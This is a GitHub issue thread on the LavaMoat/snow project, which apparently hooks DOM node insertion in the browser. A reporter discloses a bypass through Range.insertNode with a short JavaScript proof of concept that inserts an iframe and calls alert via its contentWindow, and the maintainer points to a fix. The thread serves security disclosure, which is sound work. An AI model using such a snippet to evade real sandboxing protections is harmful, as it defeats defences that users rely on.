### ISSUE TITLE
Bypass with Range.insertNode

### ISSUE THREAD

**Issue by mmndaniel** [LavaMoat/snow#86]
Nothing too clever, just yet another [node insertion method](https://developer.mozilla.org/en-US/docs/Web/API/Range/insertNode) that isn't hooked :)

```
var range = document.createRange();
var f = document.createElement("iframe");
range.selectNode(document.getElementsByTagName("head")[0]);
range.insertNode(f);
f.contentWindow.alert.call(top, 1);
```

**Comment by weizman** [comment]
Thanks, #103 should fix this.

Are there any other ways to use Range to inject a dom node? I didn't find any @mmndaniel

**Comment by mmndaniel** [comment]
Not that I'm aware of, but the DOM is wild so who knows :)
